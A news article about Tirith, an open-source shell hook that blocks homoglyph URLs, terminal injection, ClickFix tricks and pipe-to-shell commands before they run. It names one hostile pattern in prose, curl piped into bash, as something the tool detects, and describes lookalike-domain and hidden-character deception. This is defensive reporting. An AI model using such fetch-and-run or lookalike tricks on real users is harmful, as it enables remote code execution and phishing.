Tirith is a new cross-platform, open-source tool designed to prevent homoglyph attacks by inspecting shell commands for deceptive URLs before they execute. Available on GitHub and via npm, it integrates with shells like bash, zsh, and PowerShell to identify and block malicious characters or patterns that appear legitimate to the human eye.

A developer named Sheeki created Tirith to address a lingering security gap where terminal environments remain vulnerable to homoglyph and terminal injection attacks that browsers have already mitigated. While humans might see a familiar domain name, computers interpret subtle Unicode variations or invisible characters to redirect users to malicious servers. By hooking directly into the user’s shell, Tirith analyzes every pasted or typed command in real-time, ensuring that deceptive scripts are stopped before they can cause harm.

The tool provides a comprehensive defense against a variety of modern threats beyond simple lookalike characters. It is capable of detecting terminal injections such as ANSI escapes and bidi overrides, as well as dangerous pipe-to-shell patterns like curl piped into bash. Furthermore, it guards against supply-chain risks, dotfile hijacking, and the exposure of credentials in URLs, making it a robust gatekeeper for developers and system administrators who frequently interact with remote resources.

One of the primary use cases for Tirith is defending against ClickFix attacks, which often rely on hidden characters to trick users into executing malicious code. While it currently supports a wide range of environments including PowerShell, the author notes that it does not yet hook into the traditional Windows Command Prompt. This is a notable distinction given that many low-level phishing campaigns specifically target the older cmd.exe environment to bypass modern security layers.

Performance and transparency are central to the tool's design philosophy. Sheeki claims that the overhead for these security checks is at a sub-millisecond level, meaning users will not experience any lag in their command-line workflow. The tool is built to be lightweight, performing its inspection and terminating instantly to ensure that the system remains responsive while staying protected against sophisticated obfuscation techniques.

Beyond its active blocking capabilities, Tirith serves as an analytical utility for cautious users. It can break down trust signals within a URL, perform deep byte-level Unicode inspections, and generate SHA-256 audit receipts for executed scripts. This combination of proactive defense and forensic auditing provides a multi-layered approach to command-line security that addresses the evolving tactics of cybercriminals using punycode and mixed-script decoys.

Source: New Tool Blocks Imposter Attacks Disguised as Legitimate Commands